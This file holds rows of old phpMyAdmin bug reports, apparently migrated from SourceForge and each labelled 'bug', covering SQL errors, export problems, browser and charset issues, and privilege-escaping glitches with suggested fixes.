"24444","7928","ALTER TABLE fails if auto increment is blank.
If you attempt to alter a table that has no auto incrementing columns using the Operations tab and therefore no auto increment value), the operation will fail because phpMyAdmin does not check if auto increment is unused in the table configuration and therefore attempts to set AUTO INCREMENT to nothing AUTO INCREMENT = ).
Steps to reproduce 1\.
Create a table with no auto incrementing columns.
2\.
Attempt to alter the table, eg.
enable disable checksum, pack keys, or delay key write.
Expected result phpMyAdmin should pass a valid query which makes the appropriate change to the table.
Current result phpMyAdmin passes an invalid query which fails with the following error 1064 You have an error in your SQL syntax.
Check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 Current workaround Type an auto increment value into the form.
MySQL will discard this data.
Original URL https sourceforge.net p phpmyadmin bugs 1561 https sourceforge.net p phpmyadmin bugs 1561 Original author snover Found in version 2.6.0 pl3","bug"
"24444","7929","Mac Linefeeds prevent dumps being inserted.
Hello I m trying to import dumps created with PMA 2.6.0 pl3 on a remote server running 2.6.0 pl2.
I m using a Apple Safari to download the dumps from my local server and store it on my desktop.
When I try to import the dump, there always occur syntax errors.
I finally was able to conclude what s going wrong.
Please have a look at a screenshot [1].
I ve opened a SQL dump using vi, which fortunately shows hidden characteres too.
In my opinion, there are two solutions to avoid the problem in further revisions of PMA a) Don t mess up Mac, Windows and Unix Linefeeds while creating dumps.
In my oppinion, Unix linefeeds \n would be the best solution.
In case Apple Safari itself does this mess, such settings don t have any effect of course.
I haven t been able to check whether Safari is the bad guy or not.
b) Rewrite the SQL Dump Parser to first clean up received dumps, therefore replace \r and \r\n by \n .
[1] http mad4you.homeip.net downloads pma sql dump mac linefeeds.gif Thank a lot for your work!
Kind regards Mario Original URL https sourceforge.net p phpmyadmin bugs 1562 https sourceforge.net p phpmyadmin bugs 1562 Original author emeidicom Found in version 2.6.0 pl3","bug"
"24444","7930","Timestamp wrongly formated in links.
I am using MySQL 4.1.8 and PHP 5.0.2.
I have a table with a multi part primary index an auto incriment, timestamp).
When I select a row to update) in browse , phpMyAdmin generates a bad query SELECT FROM `ties eatraining training data` WHERE `id` =24 AND `timestamp` =2004 10 2615 43 33; MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 15 43 33 at line 1 Thank you for your time, Tom Original URL https sourceforge.net p phpmyadmin bugs 1563 https sourceforge.net p phpmyadmin bugs 1563 Original author memeyou Found in version Latest Git","bug"
"24444","7931","2.6.1 rc2) OK Button in left frame.
Why do you show a OK button in the left frame for choosing a server form the drop down box?
the reloading is done via onload !!!
Could you remove it or make a var in the config to hide it.
Win2000 with Firefox Original URL https sourceforge.net p phpmyadmin bugs 1564 https sourceforge.net p phpmyadmin bugs 1564 Original author j0erch","bug"
"24444","7932","cfg[ QueryWindowWidth ] in config.inc.php has no impact.
changing the var cfg[ QueryWindowWidth ] in config.inc.php has no impact.
I found out that this var in this file is needless, because the var is also in layout.inc.php and changing their value does really change the dimension of the query window.
Original URL https sourceforge.net p phpmyadmin bugs 1565 https sourceforge.net p phpmyadmin bugs 1565 Original author j0erch","bug"
"24444","7933","mysql result warning.
This happens when I try to add a column from tbl properties structure.php and when using the Query Window Trying to add a column to a table which already exists causes a PHP warning e.g.
ALTER TABLE `folders` ADD `uid` VARCHAR 255 ) NOT NULL uid already exists in my table.)
The page from PMA tested this on 2.6.1rc1 and 2) MySQL said Documentation 1060 Duplicate column name uid Warning mysql result ) [function.mysql result] Unable to jump to row 1 on MySQL result index 36 in www admin libraries common.lib.php on line 682 Original URL https sourceforge.net p phpmyadmin bugs 1566 https sourceforge.net p phpmyadmin bugs 1566 Original author voltagex","bug"
"24444","7934","Function cannot be used with MYSQL USE RESULT.
I am running with PHP 5.0.2 and MySQL 4.1.9 on Windows XP.
When I have my editor PHPEdit) open and I try to do certain things with phpMyAdmin the debugger detects and error, halts execution, then loads the script to show the offending line.
The details are Warning in F \Apache2\HTDOCS\phpMyAdmin 2.6.1 rc2 \libraries\dbi\mysqli.dbi.lib.php on line 227. mysqli num rows ) Function cannot be used with MYSQL USE RESULT.
debug backtrace ) array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 rc2\libraries\dbi\mysqli.dbi.lib.php line long = 227 function string = mysqli num rows args array = 0 object = mysqli result 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 rc2\libraries\bookmark.lib.php line long = 144 function string = PMA DBI num rows args array = 0 object = mysqli result 2 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 rc2\left.php line long = 596 function string = PMA queryDBBookmarks args array = 0 string = menu 1 array = user string = root db string = phpmyadmin table string = pma bookmark 2 array = This happens when I select a database, or try to export a database.
Original URL https sourceforge.net p phpmyadmin bugs 1567 https sourceforge.net p phpmyadmin bugs 1567 Original author tonymarston Found in version 2.6.1 rc2","bug"
"24444","7935","Broken shift jis japanese) support after 2.5.7 pl1.
After upgrading phpMyAdmin from version 2.5.7 pl1 to any release after this, there is a problem setting and displaying shift jis encoded data properly.
I ve tried to force shift jis encoding by modifying the source files of phpMyAdmin to no use it seems to manipulate the data so it shows wrongly in the browser.
Versions FreeBSD 5.3 mySQL 4.1.8 PHP 5.0.2 Lars Original URL https sourceforge.net p phpmyadmin bugs 1568 https sourceforge.net p phpmyadmin bugs 1568 Original author ljweb Found in version 2.6.0","bug"
"24444","7936","2.6.2 dev) Strange error on SHOW TABLES SHOW TABLE STATUS.
When I try to run queries like SHOW TABLES; or SHOW TABLE STATUS; , I get a very strange error SQL query SHOW CREATE TABLE `test`.` sql 52e 0` MySQL said 1146 Table test.
sql 52e 0 doesn t exist This is reproducable on my demo machine, for instance.
Original URL https sourceforge.net p phpmyadmin bugs 1569 https sourceforge.net p phpmyadmin bugs 1569 Original author rabus Found in version Latest Git","bug"
"24444","7937","bz2 export broken in Safari.
bz2 export is broken in phpMyAdmin 20050119 when using Safari 1.2.4.
When I export in bz2, the compressed data now gets dumped into the browser window, instead of downloading it as a file like it used to.
The most recent previous version that I have, phpMyAdmin 20041219, saves bz2 exports in Safari just fine.
gz works fine in both versions.
You used to send the MIME type application x bzip but now you send MIME type text x sql and content encoding x bzip2.
Firefox 1.0 and Internet Explorer for Mac 5.2.3 seem to handle either PMA version equally poorly that is, in both programs, a dialog box is displayed asking what I want to do with the file, instead of just downloading the damn thing.
But I guess those are probably bugs in Firefox and IE, not PMA.
Yet another reason why I never use those browsers.
Original URL https sourceforge.net p phpmyadmin bugs 1571 https sourceforge.net p phpmyadmin bugs 1571 Original author ryandesign Found in version Latest Git snapshot","bug"
"24444","7938","PDF missing Content Type header.
There s no Content Header when displaying PDF pages.
So firefox just displays binary data that I dont seem to be able to read anything of it).
So I added header Content Type application pdf ); on line 1045 and that seems to fix it.
It may be an ugly hack or the function may belong someplace else) but it seems sufficent for me.
function PMA RT showRt ) \{ global pdf, db, pdf page number, cfgRelation; \ header Content Type application pdf ); pdf gt;SetFontSize 14); pdf gt;SetLineWidth 0.2); .... \} Tomas Fox!MURDER Zvala Original URL https sourceforge.net p phpmyadmin bugs 1570 https sourceforge.net p phpmyadmin bugs 1570 Original author foxmurder Found in version 2.6.1 rc2","bug"
"24444","7939","php errors in query window.
When opening the query window by clicking the icon in the left frame, I sometimes see the following PHP errors inside the textarea lt;br gt; lt;b gt;Notice lt; b gt; Undefined variable fields list in lt;b gt;[PMA path] tbl query box.php lt; b gt; on line lt;b gt;167 lt; b gt; lt;br gt; lt;br gt; lt;b gt;Warning lt; b gt; implode ) Bad arguments.
in lt;b gt;[PMA path] tbl query box.php lt; b gt; on line lt;b gt;167 lt; b gt; lt;br gt; Reproducable on my demo machine.
I don t know, wheather QA 2 6 1 is also affected or not.
Original URL https sourceforge.net p phpmyadmin bugs 1573 https sourceforge.net p phpmyadmin bugs 1573 Original author rabus Found in version Latest Git","bug"
"24444","7940","cookie auth returning blank page on invalid user.
I m using cookie authentification on my server and every time i type wrong user pass i get blank page.
This may relate to php being installed as FastCGI.
Also when i do http auth i get error 500 on bad login.
what php version is the http auth supposed to be fixed?)
Im attaching HTTP transaction log from FireFox Live HTTP Headers).
Server name is obfuscated and I was logging in as root with an empty password.
there is password set for root) If you need any more data to debug this, please let me know.
Original URL https sourceforge.net p phpmyadmin bugs 1572 https sourceforge.net p phpmyadmin bugs 1572 Original author foxmurder Found in version 2.6.1 rc2","bug"
"24444","7941","mysqli free result ) expects parameter 1 ....
I am running PHP 5.0.2 under Windows XP with MySQL 4.1.9.
When I have my editor PHPEdit with debug switched on) and I try to export data from one of my databases the script is halted inside my editor with the following message displayed mysqli free result ) expects parameter 1 to be a result, boolean given.
debug backtrace ) array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 \libraries\dbi\mysqli.dbi.lib.php line long = 174 function string = mysqli free result args array = 0 bool = TRUE 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 \libraries\export\sql.php line long = 61 function string = PMA DBI free result args array = 0 bool = TRUE 2 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 \export.php line long = 355 function string = PMA exportHeader args array = Original URL https sourceforge.net p phpmyadmin bugs 1574 https sourceforge.net p phpmyadmin bugs 1574 Original author tonymarston Found in version 2.6.1","bug"
"24444","7942","Create database sometimes not available.
On about 50 of our database servers we are getting Create new database No Privileges on main.php.
But the user does have permissions to access to create databases.
I followed the flow of what is happening and here is the difference I have found.
This one does work correctly, by showing the at the user can create a database on this server.
mysql gt; show grants \G;; 1. row Grants for phpmyadmin GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE ON .
TO phpmyadmin IDENTIFIED BY PASSWORD F2changed WITH GRANT OPTION 1 row in set 0.00 sec) This one does not work correctly, as you can see for whatever reason it seems that it returns 2 results.
Even though we only have 1 entry in the mysql.user table.
mysql gt; show grants; | Grants for phpmyadmin | | GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, RELOAD, SHUTDOWN, PROCESS, FILE, REFERENCES, INDEX, ALTER, SHOW DATABASES, SUPER, CREATE TEMPORARY TABLES, LOCK TABLES, EXECUTE ON .
TO phpmyadmin IDENTIFIED BY PASSWORD F2changed WITH GRANT OPTION | 1 row in set 0.00 sec) Original URL https sourceforge.net p phpmyadmin bugs 1575 https sourceforge.net p phpmyadmin bugs 1575 Original author donsimon Found in version 2.6.1","bug"
"24444","7943","phpMyAdmin db list dog slow with Innodb Tables.
This is caused by phpMyAdmin issuing very expensive, as far as innodb goes, select count ) as count from db.table queries for each table when listing the tables of a db.
I have 90 of all tables in innodb and as result of the count ) queries, I can t even display the list of tables due to timeout issues.
Please give us innodb users an option to disable the awesomely expensive count ) queries.
Original URL https sourceforge.net p phpmyadmin bugs 1576 https sourceforge.net p phpmyadmin bugs 1576 Original author xingli Found in version 2.6.1","bug"
"24444","7944","Field table names events , level type get capitalised.
I have a table called events.
When I run a custom SQL query such as SELECT FROM events phpMyAdmin capitalises events as if it were a reserved word like SELECT and FROM, resulting in an unknown table name.
If EVENTS was a reserved word, it isn t now, so it would be helpful if phpMyAdmin would differentiate based on mysql version, as if I paste in working queries from other scripts, I invariably to check to backquote it.
Original URL https sourceforge.net p phpmyadmin bugs 1577 https sourceforge.net p phpmyadmin bugs 1577 Original author fluffy lobster","bug"
"24444","7945","Export to SQL does not correctly escape strings.
There is a bug in the export to SQL script that incorrectly identifies some fields as numeric and does not escape them with single quotes.
It was easily fixed by replacing \} elseif fields meta[ j] gt;numeric fields meta[ j] gt;type != timestamp ) \{ with \} elseif fields meta[ j] gt;numeric fields meta[ j] gt;type != timestamp is numeric row[ j])) \{ in .
libraries export sql.php line 541 Original URL https sourceforge.net p phpmyadmin bugs 1578 https sourceforge.net p phpmyadmin bugs 1578 Original author peptolab Found in version 2.6.1","bug"
"24444","7946","Javascript error Access is denied.
Once you select the database from the dropdown list to admin data, a javascript error message Access is denied comes up.
It always points to this section of javascript.
I am using IE 6 browser.
Is there anything I need to make change in config file?
it works fine in my local server, but the error is only in remote hosting server.
if parent.frames.queryframe parent.frames.queryframe.document parent.frames.queryframe.document.queryframeform) \{ parent.frames.queryframe.document.queryframeform.db.v alue = cad poll ; parent.frames.queryframe.document.queryframeform.tabl e.value = pollsettings ; \} if parent.frames.queryframe parent.frames.queryframe.document parent.frames.queryframe.document.left parent.frames.queryframe.document.left.lightm db) \{ selidx = parent.frames.queryframe.document.left.lightm db.select edIndex; if parent.frames.queryframe.document.left.lightm db.optio ns[selidx].value == cad poll ) \{ parent.frames.queryframe.document.left.lightm db.option s[selidx].text = cad poll 3) ; \} else \{ parent.frames.queryframe.location.reload ); setTimeout dbBoxSetup ); ,2000); \} \} Original URL https sourceforge.net p phpmyadmin bugs 1580 https sourceforge.net p phpmyadmin bugs 1580 Original author mkishor Found in version 2.6.1","bug"
"24444","7947","mysqli undefined function.
A failed connection to the server for example with a wrong password), when using mysqli, is not detected properly.
Original URL https sourceforge.net p phpmyadmin bugs 1581 https sourceforge.net p phpmyadmin bugs 1581 Original author lem9","bug"
"24444","7948","Undefined index with Japanese lang file.
I can select any language except japanese in phpMyAdmin.
After selecting japanese I get this error lt;quote gt; Fatal error Call to undefined function pma reloadnavigation ) in phpMyAdmin header.inc.php on line 132 lt; quote gt; So, I commented out the PMA reloadNavigation ) line in header.inc.php, and then I saw that it was calling lt;quote gt; SET CHARACTER SET ; lt; quote gt; Notice the actual character set is missing.
So it appears that for some reason, when selecting japanese, the mysql charset variable is empty in libaries database interface.lib.php This problem began only after upgrading from mysql 4.0 to mysql 4.1.
No other problems have become apparent since the upgrade.
Data can still be managed through custom PHP scripts with no problems.
Tried latest CVS code as well as the 2.6.1 release and got this error in both.
Versions php 4.3.10 MySQL 4.1.8 Apache 1.3.33 Linux CentOS 3.3 Browsers used on win32 IE 6.0 Firefox 1.0 Original URL https sourceforge.net p phpmyadmin bugs 1582 https sourceforge.net p phpmyadmin bugs 1582 Original author barwin Found in version 2.6.1","bug"
"24444","7949","JavaScript error Opera only).
This problem occurs when I choosed database from database list combobox in left navigation) .
This error is just in Opera 7.54.
Problem is that I need start myadmin again, because I can t choose next database.
Inline script thread Error name ReferenceError message Security error attempted to read protected variable Timeout thread delay 1000 ms Error name ReferenceError message Security error attempted to read protected variable Event thread onchange Error name Error message Security violation Event thread onchange Error name Error message Security violation Original URL https sourceforge.net p phpmyadmin bugs 1584 https sourceforge.net p phpmyadmin bugs 1584 Original author akelavlk Found in version 2.6.1","bug"
"24444","7950","Slash not removed DB specific privileges).
When adding database specific privileges to a database that has an underscore a slash \ is not removed from the data base name there by not setting permissions correctly.
Original URL https sourceforge.net p phpmyadmin bugs 1585 https sourceforge.net p phpmyadmin bugs 1585 Original author seeker 952 Found in version 2.6.1","bug"
"24444","7951","Safari outputs instead of download.
CLIENT System OS X 10.3.7 on Apple Powermac dual G4 Browser Safari 1.2.4 SERVER s) Server local 127.0.0.1) on OS X 10.3.7 Apple Powermac dual G4 Apache 1.3.33 Darwin PHP 4.3.2 same bug on 2nd server remote, production) System Debian on x386 machine Apache 1.3.28 Unix mod ssl 2.8.15 OpenSSL 0.9.7c PHP 4.3.8 DESCRIPTION When clicking on Export Tab, whether an entire DB or a single table is selected, Safari does not download the .sql file, but outputs it in the frame, as if Save as file was not checked.
This problem dit not occur with Safari on 2.6.1 rc2, or 2.6.0 pl2, the latest versions I have been flawlessly able to use prior to this bug.
I assume the problem is not Safari related.
OS X Firefox prompts to save the file on disk, thus works as expected.
Original URL https sourceforge.net p phpmyadmin bugs 1583 https sourceforge.net p phpmyadmin bugs 1583 Original author bonatoc Found in version 2.6.1","bug"
"24444","7952","column type select bad on float.
Hello!
I ve created a table CREATE TABLE `rossz` `id` float unsigned NOT NULL default 0 ) TYPE=MyISAM; And I want to change the id column, but the type select shows varchar instead float.
Bye!
Lay Original URL https sourceforge.net p phpmyadmin bugs 1588 https sourceforge.net p phpmyadmin bugs 1588 Original author laysoft Found in version 2.6.1","bug"
"24444","7953","Calendar popup not working properly.
Using phpMyAdmin 2.6.1 MySQL 4.1.9 PHP 5.0.3 OSX10.3.7 Firefox 1.0 When I click on the Calendar popup for a TIMESTAMP field, the month shows up as undefined .
Then, if I click the left or right arrows for the month, it acts like the month is 0, as in the left arrow goes to December of the previous year, and right goes to January of that year.
It makes no difference what month day is defined in the TIMESTAMP field, the month becomes undefined.
If you select a date while the month is still undefined , the date is inserted as something like this 20050002010009 Notice how the month portion of the TIMESTAMP is 00.
Original URL https sourceforge.net p phpmyadmin bugs 1586 https sourceforge.net p phpmyadmin bugs 1586 Original author majiclab Found in version 2.6.1","bug"
"24444","7954","Error when SHOW DATABASES is disallowed.
It took me some time to track down the exact source of this issue, so I ll do my best to give all the information I have.
I am using phpMyAdmin 2.6.1 with php 4.1.2 and MySQL 3.23.56, with many servers set up in config.inc.php, most of which connect to a remote mySQL server.
When trying to log in to one of the server setups that connects to a certain remote mySQL server, I get the following php error message Fatal error Call to undefined function pma reloadnavigation ) in [my webroot] phpMyAdmin header.inc.php on line 132 I figured out that the function PMA reloadNavigation is located in common.lib.php, so I tried require once on that file just before the function call on line 132, but even then php was unable to find the function.
After a lot of work, I was able to figure out that the reason the function wasn t defined was that around line 1300 of common.lib.php, the script stops executing.
I believe that what is happening is that the remote server does not allow the command SHOW DATABASES , so the following lines local query = SHOW DATABASES LIKE \ .
dblist[ i] .
\ ; rs = PMA DBI query local query, dbh); cause the script to exit without any useful error messages being displayed.
The result that the function PMA reloadNavigation , which appears later in the file, isn t getting defined.
I worked around this problem by commenting out the following line on about line 1280 is show dbs = TRUE; Everything seems to work fine so far with that line commented out, but I have no real idea of what functionality I am disabling by doing that.
Original URL https sourceforge.net p phpmyadmin bugs 1587 https sourceforge.net p phpmyadmin bugs 1587 Original author karen lundgren Found in version 2.6.1","bug"
"24444","7955","mcrypt decrypt ) size of key too large.
Since updating perl to 5.8.6, I have the following issue with phpMyAdmin In cookie mode authentication, I get Warning mcrypt decrypt ) [function.mcrypt decrypt] Size of key is too large for this algorithm in usr local www secure phpMyAdmin libraries mcrypt.lib.php on line 90 However, the config authorisation works fine.
Here are my system details 5.3 STABLE FreeBSD PHP 5.0.3 cli) built Feb 3 2005 10 19 11) DEBUG) This is perl, v5.8.6 built for i386 freebsd 64int libmcrypt 2.5.7 1 php5 mcrypt 5.0.3 2 Do you have any idea why this is happening?
Original URL https sourceforge.net p phpmyadmin bugs 1589 https sourceforge.net p phpmyadmin bugs 1589 Original author kierun","bug"
"24444","7956","Version mistake in WebSite.
Alright, this is not a bug in phpMyAdmin, but in the website.
I found there is a mistake of the QUICK DOWNLOADS section on the frontpage.
Latest stable version 2.6.1 seems to be ok Latest version should not be stable release, it s somehow in alpha or beta, but it s strange to tell tested with PHP lt;4.1.0 , etc.
also the version must not be 2.2.7 pl1, the download link is broken too).
I have discovered it for a long time, but phpMyAdmin seems doesn t notice it?
=) Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 1590 https sourceforge.net p phpmyadmin bugs 1590 Original author jefferywong","bug"
"24444","7957","export fails in IE 6 XP SP2).
Strange behavior the table db exports fails on one of our mysql db servers if I m using IE6 for browsing.
With opera firefox it s still working.. after changing export.php from Line 302) lem9 loic1 IE need specific headers if PMA USR BROWSER AGENT == IE ) \{ header Pragma public ); header Content Disposition inline; filename= .
filename .
); header Cache Control must revalidate, post check=0, pre check=0 ); \} else \{ header Content Disposition attachment; filename= .
filename .
); header Pragma no cache ); \} \} else \{ to if PMA USR BROWSER AGENT == IE ) \{ header Pragma public ); header Content Disposition inline; filename= .
filename .
); header Cache Control must revalidate, post check=0, pre check=0 ); LM header Pragma no cache ); header Content Disposition attachment; filename= .
filename .
); \} else \{ header Content Disposition attachment; filename= .
filename .
); header Pragma no cache ); \} it works again.
Grettings Linard Original URL https sourceforge.net p phpmyadmin bugs 1591 https sourceforge.net p phpmyadmin bugs 1591 Original author lin art Found in version 2.6.3 pl1","bug"
"24444","7958","mysqli free result; expects parameter 1 ....
I am running PHP 5.0.3 under Windows XP with MySQL 4.1.9.
When I have my editor PHPEdit with debug switched on) and I try to edit a database record the script is halted inside my editor with the following message displayed Warning in ...\phpMyAdmin 2.6.1 \libraries\dbi\mysql.dbi.lib.php on line 179 mysqli free result; expects parameter 1 to be mysqli result, boolean given debug backtrace ) array = 0 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 \libraries\dbi\mysqli.dbi.lib.php line long = 179 function string = mysqli free result args array = 0 bool = TRUE 1 array = file string = F \Apache2\HTDOCS\phpMyAdmin 2.6.1 \tbl replace.php line long = 243 function string = PMA DBI free result args array = 0 bool = TRUE Original URL https sourceforge.net p phpmyadmin bugs 1592 https sourceforge.net p phpmyadmin bugs 1592 Original author tonymarston Found in version 2.6.1","bug"
"24444","7959","commands out of sync copy table to .
I m using php 5.0.3 with mysql 4.1.9 nt on windows xp using the mysqli extension.
When I go into the Operations tab on for a particular table and try to copy a table structure and data) I get the following error SQL query Edit INSERT IGNORE INTO `pma relation` `master field` , `foreign db` , `foreign table` , `foreign field` , `master db` , `master table` ) VALUES client id , dating , client details , client id , dating , blah ) MySQL said Documentation 2014 Commands out of sync; you can t run this command now The table does actually get created and the data does get copied, but it looks like it also tried to copy the relation information and that fails.
Original URL https sourceforge.net p phpmyadmin bugs 1593 https sourceforge.net p phpmyadmin bugs 1593 Original author pearj Found in version Latest Git snapshot","bug"
"24444","7960","search fails with error.
Using phpMyAdmin 2.6.1 or earlier), with a database using charset latin1 and collation latin1 german1 ci, with a table in it and all char, varchar fields in latin1 german1 ci, moreover, using collation for connecion using drop down menu in login page) latin1 german1 ci, I am not able to use the search function.
This is what I get.
requxc4x99te SQL SELECT FROM `b allo` WHERE `pays` LIKE CONVERT utf8 be USING latin1 ) LIMIT 0 , 30 MySQL a rxc3xa9pondu 1267 Illegal mix of collations latin1 german1 ci,IMPLICIT) and latin1 swedish ci,IMPLICIT) for operation like If you developpers want a temporary access to it so that you can see it live, feel free to ask me.
Original URL https sourceforge.net p phpmyadmin bugs 1594 https sourceforge.net p phpmyadmin bugs 1594 Original author herel Found in version 2.6.1","bug"
"24444","7961","Wrong parameter count with php 4.1.x.
X Powered By PHP 4.1.2 Content type text html lt;br gt; lt;b gt;Warning lt; b gt; Wrong parameter count for srand ) in lt;b gt; lt; b gt; on line lt;b gt;1 lt; b gt; lt;br gt; The solution diff ru phpMyAdmin 2.6.1.orig libraries mcrypt.lib.php phpMyAdmin 2.6.1 libraries mcrypt.lib.php phpMyAdmin 2.6.1.orig libraries mcrypt.lib.php 2004 11 25 14 26 09 0100 phpMyAdmin 2.6.1 libraries mcrypt.lib.php 2005 02 07 15 59 32 0100 12,7 12,11 per server so I don t put the server number in the cookie name.
if !isset COOKIE[ pma mcrypt iv ])) \{ srand ); \ if PMA PHP INT VERSION gt;= 40200) \{ \ srand ); \ \} else \{ \ srand time 0) getmypid ) lcg value )); \ \} iv = mcrypt create iv mcrypt get iv size MCRYPT BLOWFISH, MCRYPT MODE CBC), MCRYPT RAND); setcookie pma mcrypt iv , base64 encode iv), Original URL https sourceforge.net p phpmyadmin bugs 1595 https sourceforge.net p phpmyadmin bugs 1595 Original author d3xter Found in version 2.6.1","bug"
"24444","7962","Host not changing when editing users.
When editing a user s priveleges ie changing the password), the host drop down field stays at Any host.
ie.
I edit my user andys 81.77.192.176 and put a new password in the Change Login information... box.
The host field reads Any host , with 81.77.192.176 in the text field.
I click Go, and my user andys 81.77.192.176 remains unmodified, but a new user called andys is created with my new password.
By default, the host field should change to localhost if the user is username localhost, remain Any host if the user is username and Use text field if it s anything else.
Great software though.
Original URL https sourceforge.net p phpmyadmin bugs 1596 https sourceforge.net p phpmyadmin bugs 1596 Original author andyccn Found in version 2.6.1","bug"
"24444","7963","Wrongly displayed indexes in print view.
Under print view for tables, indexes show Fulltext type as Index type.
Original URL https sourceforge.net p phpmyadmin bugs 1597 https sourceforge.net p phpmyadmin bugs 1597 Original author deer421 Found in version 2.6.1","bug"
"24444","7964","Problems with underscore in usernames and dbnames.
Whenever the underscore sign is used in a database name, it is not escaped properly, when changing or adding the privileges.
For example, I had a set of permissions for the database called thd\ intranet , after adding or removing permissions related to this database, phpmyadmin creates an additional entry for the database with the name thd intranet , and does not modify the original escaped name.
Same applies to the user management.
When I try to delete the user called cts intranet and choose Revoke all active privileges from the users and delete them afterwards , I get an error SQL query REVOKE ALL PRIVILEGES ON `query suite` .
FROM cts intranet localhost ; MySQL said 1141 There is no such grant defined for user cts intranet on host localhost The latter maybe caused by the underscore in the database name and not by the underscore in the user name.
I did not check it further.
Thanks for the great application!!!
Original URL https sourceforge.net p phpmyadmin bugs 1598 https sourceforge.net p phpmyadmin bugs 1598 Original author unclef Found in version 2.6.1","bug"
"24444","7965","Comment at the end of a query and LIMIT.
SELECT FROM mytable ORDER BY id DESC Showing rows shows 0 29 even if there are a milions of rows because limit is commented as well.
Its simply kill your server browser.
Pretty printer shows query as it is shown bellow with limit 0,30 commented.
Just put the limit on the new line before parsing or smth like this.
Original URL https sourceforge.net p phpmyadmin bugs 1599 https sourceforge.net p phpmyadmin bugs 1599 Original author fabio Found in version 2.6.1","bug"
"24444","7966","Query no longer show after affected message..
When you make a update query, the sql is no longer show in this version present in previous version) disp query is not append to the query.
this is due of the change in tblrepplace in version 2.6.1 265 I don t understand this one add query = strpos .
goto, tbl change ) ?
disp query= .
urlencode sql query) ); if we have seen binary, we do not append the query to the Location so it won t be displayed on the resulting page Nijel we also need to limit size of url... 273 add query = !
seen binary strlen sql query) lt; 1024 ?
disp query= .
urlencode sql query) ); I have replace the ligne 273 by add query = !
seen binary strlen sql query) lt; 1024)|| strpos .
goto, tbl change )) ?
disp query= .
urlencode sql query) ); so it will concatenate the two request and show the query after update if I stay on the same page.
That what I want.
Maybe you will do best code !!!
Thanks for this new version Fred Original URL https sourceforge.net p phpmyadmin bugs 1600 https sourceforge.net p phpmyadmin bugs 1600 Original author noonet2005 Found in version 2.6.1","bug"
"24444","7967","Reload MySQL not seen on MySQL 4.1.2 .
Due to the new logic in main.php use of SHOW GRANTS), the is reload variable is not set, and the Reload MySQL link does not show.
Original URL https sourceforge.net p phpmyadmin bugs 1604 https sourceforge.net p phpmyadmin bugs 1604 Original author lem9 Found in version 2.6.1","bug"
"24444","7968","A bug with the number 0.
When you perform a query which ends with the number 0, the 1st row of your result is replaced by the number 0 !
Here is my test create database mytest ; CREATE TABLE `a` `a1` INT NOT NULL , `a2` INT NOT NULL ); INSERT INTO `a` VALUES 1, 1 ) ; INSERT INTO `a` VALUES 2, 2 ) ; INSERT INTO `a` VALUES 3, 3 ) ; INSERT INTO `a` VALUES 4, 4 ) ; select from a ; | a1 | a2 | | 1 | 1 | | 2 | 2 | | 3 | 3 | | 4 | 4 | select ,0 from a ; | a1 | a2 | 0 | | 0 | 1 | 0 | | 0 | 2 | 0 | | 0 | 3 | 0 | | 0 | 4 | 0 | although you should have you have it with mySql client) select ,0 from a ; | a1 | a2 | 0 | | 1 | 1 | 0 | | 2 | 2 | 0 | | 3 | 3 | 0 | | 4 | 4 | 0 | the bug is the same with the query select , 0 from a ; type string 0 ) You can try this query too select 4,3,2,1,0 ; bug it works when you do select ,0 0 from a ; Original URL https sourceforge.net p phpmyadmin bugs 1601 https sourceforge.net p phpmyadmin bugs 1601 Original author easyzik Found in version 2.3.3 rc1","bug"
"24444","7969","Exporting as GZIP compresses file twice.
On both Windows and Linux, exporting with gzip compression produces gzip inside gzip For example, when I export the table called testcase , I get the file `testcase.sql.gz`.
This is a GZIP archive, which contains one file `testcase.sql`.
The testcase.sql file is not a text file as one would normally expect.
The `testcase.sql` is itself a GZIP archive containing a file called `testcase` inside, which finally IS the textfile with the SQL commands.
Is this intended?
Original URL https sourceforge.net p phpmyadmin bugs 1602 https sourceforge.net p phpmyadmin bugs 1602 Original author unclef Found in version Latest Git","bug"
"24444","7970","FAQ 6.12 export options) out of date.
For the web page titled phpMyAdmin 2.6.2 dev Documentation at http www.phpmyadmin.net home page docs.php FAQ question 6.12 I want to understand some Export options ) is out of date with respect to the current implementation 2.6.1 rc1) Specifically, the FAQ question doesn t cover the following options on the phpMyAdmin export screen Add DROP TABLE Add IF NOT EXISTS Use delayed inserts Use ignore inserts Original URL https sourceforge.net p phpmyadmin bugs 1603 https sourceforge.net p phpmyadmin bugs 1603 Original author obiwan2u Found in version 2.6.1 rc1","bug"
"24444","7971","Cannot access anything Missing parameter Array .
I am running phpMyAdmin 2.6.1 MySQL 4.0.23a PHP 4.3.10 Apache 2 Fedora Core 2 safe mode off I can log in fine to phpmyadmin.
If I try to create a database, list the databases, go to the provileges section or anything I get the following error Missing parameter Array Missing parameter Array This doesn t make much sense.
I can easily access mysql from my own php scripts using the same username and password.
I can access it from webmin s mysql administration module.
phpMyAdmin 2.2.7 pl1 works perfectly.
What is the deal?
Original URL https sourceforge.net p phpmyadmin bugs 1605 https sourceforge.net p phpmyadmin bugs 1605 Original author jclawson Found in version 2.6.1","bug"
"24444","7972","Unable to escape in db name in rights.
In a multi user setup, we can no longer escape the character in the database name.
We used to be able to enter UserName\ and the database name would be UserName dbName.
Now the database name is UserName?dbname with the wild card).
Original URL https sourceforge.net p phpmyadmin bugs 1606 https sourceforge.net p phpmyadmin bugs 1606 Original author donbrown49 Found in version 2.6.4 pl3","bug"
"24444","7973","Script breaks when blowfish secret empty.
If the cookie authorization type is used and cfg[ blowfish secret ] is left empty, PMA produces quite an ugly PHP mcrypt decrypt ) error and dies in the middle of output.
An error handling could be nicer.
